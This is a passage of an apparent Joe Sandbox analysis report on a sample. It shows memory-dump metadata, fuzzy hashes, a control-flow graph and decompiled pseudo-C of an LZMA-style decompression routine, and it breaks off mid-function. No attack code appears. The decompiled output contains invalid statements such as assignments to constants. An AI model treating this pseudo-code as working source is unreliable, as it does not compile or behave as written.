                                                                                                                0x004069cc
                                                                                                                0x00000000
                                                                                                                0x004069cc
                                                                                                                0x00406819
                                                                                                                0x00406899
                                                                                                                0x00406862

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                                • Instruction ID: 319d18918fa2cc3741333e20ed782d5c303dd2f769888eebbc994f2124d7c2e6
                                                                                                                • Opcode Fuzzy Hash: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                                • Instruction Fuzzy Hash: 29A15171E00229CBDF28CFA8C8547ADBBB1FF44305F15812AD856BB281D7789A96DF44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406767, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 940 406767-40676b 941 40678d-40679a 940->941 942 40676d-40686f 940->942 944 40679d-4067b2 941->944 950 406899-40689d 942->950 945 4067b4-4067ca 944->945 946 4067cc-4067e2 944->946 948 4067e5-4067ec 945->948 946->948 951 406813 948->951 952 4067ee-4067f2 948->952 955 4068fd-406910 950->955 956 40689f-4068c0 950->956 957 406819-40681f 951->957 953 4069a1-4069ab 952->953 954 4067f8-406810 952->954 958 4069b7-4069ca 953->958 954->951 955->957 959 4068c2-4068d7 956->959 960 4068d9-4068ec 956->960 962 405fc4 957->962 963 4069cc 957->963 965 4069cf-4069d3 958->965 964 4068ef-4068f6 959->964 960->964 966 406070-406074 962->966 967 4060e0-4060e4 962->967 968 405fcb-405fcf 962->968 969 40610b-40612c 962->969 963->965 970 406896 964->970 971 4068f8 964->971 976 406920-40692a 966->976 977 40607a-406093 966->977 973 4060ea-4060fe 967->973 974 40692f-406939 967->974 968->958 972 405fd5-405fe2 968->972 969->944 970->950 978 40687b-406893 971->978 979 4069ad 971->979 972->963 980 405fe8-40602e 972->980 981 406101-406109 973->981 974->958 976->958 982 406096-40609a 977->982 978->970 979->958 984 406030-406034 980->984 985 406056-406058 980->985 981->967 981->969 982->966 983 40609c-4060a2 982->983 986 4060a4-4060ab 983->986 987 4060cc-4060de 983->987 988 406036-406039 GlobalFree 984->988 989 40603f-40604d GlobalAlloc 984->989 990 406066-40606e 985->990 991 40605a-406064 985->991 992 4060b6-4060c6 GlobalAlloc 986->992 993 4060ad-4060b0 GlobalFree 986->993 987->981 988->989 989->963 994 406053 989->994 990->982 991->990 991->991 992->963 992->987 993->992 994->985
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E00406767() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
